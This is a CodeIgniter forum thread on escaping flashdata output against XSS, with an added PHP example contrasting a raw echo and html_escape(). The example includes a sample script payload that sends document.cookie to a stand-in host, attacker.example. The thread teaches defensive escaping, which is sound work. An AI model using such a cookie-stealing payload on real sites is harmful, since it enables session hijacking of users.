CodeIgniter Forums
xss flashdata class - Printable Version

+- CodeIgniter Forums (https://forum.codeigniter.com)
+-- Forum: Development (https://forum.codeigniter.com/forumdisplay.php?fid=6)
+--- Forum: CodeIgniter 3.x (https://forum.codeigniter.com/forumdisplay.php?fid=17)
+--- Thread: xss flashdata class (/showthread.php?tid=76318)



xss flashdata class - az1409 - 05-02-2020

Hi All,

If I need to sanitize the piece of code below in CI (v3.1.10)

<?php echo $this->session->flashdata('error'); ?>

how do I do it?

And one more thing: xss_clean is completely deprecated in CI (v3.1.10), so we cannot use it?


RE: xss flashdata class - jreklund - 05-03-2020

You should use html_escape() or xss_clean() when you print strings that are not XSS safe. Personally I use html_escape() as I don't want anything to have the slightest chance of slipping through.

PHP Code:
<?php echo html_escape($this->session->flashdata('error')); ?>

It's deprecated for input validation, as you should filter your data. Do you only want numbers? Check that it's not a letter, etc.
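The point of the answer above is that the escaping happens at the output step, not when the flash message is stored. The script below is an added, stand-alone example written for this page; it is not code from the thread or from CodeIgniter. Because it runs outside the framework, ci_style_html_escape() is a local reimplementation written to match what CI3's html_escape() does (htmlspecialchars with ENT_QUOTES, the configured charset, recursion into arrays), with 'UTF-8' standing in for config_item('charset'); inside a real CI3 view you would call html_escape() itself. The flash message, its payload and the attacker.example URL are constructed for the demonstration.

```php
<?php
// Added example, not from the forum thread or the CodeIgniter code base.
// Shows the raw echo from the question beside the escaped version, in both
// element-body and attribute contexts, plus the array case.
declare(strict_types=1);

// Local stand-in for CodeIgniter 3's html_escape() so this runs without the
// framework: htmlspecialchars() with ENT_QUOTES, charset, array recursion.
function ci_style_html_escape($var, bool $double_encode = true)
{
    if (empty($var)) {
        return $var;
    }
    if (is_array($var)) {
        foreach (array_keys($var) as $key) {
            $var[$key] = ci_style_html_escape($var[$key], $double_encode);
        }
        return $var;
    }
    // 'UTF-8' is an assumption standing in for config_item('charset').
    return htmlspecialchars((string) $var, ENT_QUOTES, 'UTF-8', $double_encode);
}

// Constructed attacker-influenced value, e.g. a message built from a submitted
// username and stored with $this->session->set_flashdata('error', ...).
$flash = 'Login failed for user "<script>document.location=\'https://attacker.example/?c=\'+document.cookie</script>"';

// 1. Vulnerable: the raw echo from the question. The <script> tag reaches the DOM.
$vulnerable = '<div class="alert">' . $flash . '</div>';

// 2. Hardened: escape at the point of output, as the answer recommends.
//    < > & " ' become entities, so the browser renders text, not markup.
$safe_body = '<div class="alert">' . ci_style_html_escape($flash) . '</div>';

// 3. ENT_QUOTES also escapes " and ', so the same call is safe inside a quoted
//    attribute, where a bare quote would otherwise break out of the attribute.
$safe_attr = '<input type="hidden" name="last_error" value="' . ci_style_html_escape($flash) . '">';

// 4. Arrays are escaped recursively, for flashdata carrying several messages.
$messages      = ['name' => '<b>required</b>', 'email' => "Bob's email is invalid & unused"];
$safe_messages = ci_style_html_escape($messages);

echo "VULNERABLE:\n$vulnerable\n\n";
echo "ESCAPED (element body):\n$safe_body\n\n";
echo "ESCAPED (attribute):\n$safe_attr\n\n";
echo "ESCAPED (array):\n";
print_r($safe_messages);
```

One caveat worth keeping in mind: html_escape() produces output that is safe in HTML text and quoted HTML attribute contexts. If a flash value is ever written into a JavaScript string, a URL, or CSS, that context needs its own encoding (for example json_encode() for a JS literal), because HTML entity encoding does not neutralize those grammars.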


RE: xss flashdata class - az1409 - 05-03-2020

(05-03-2020, 02:08 AM)jreklund Wrote: You should use html_escape() or xss_clean() when you print strings that are not XSS safe. Personally I use html_escape() as I don't want anything to have the slightest chance of slipping through.

PHP Code:
<?php echo html_escape($this->session->flashdata('error')); ?>

It's deprecated for input validation, as you should filter your data. Do you only want numbers? Check that it's not a letter, etc.

Thanks for your quick help and response!!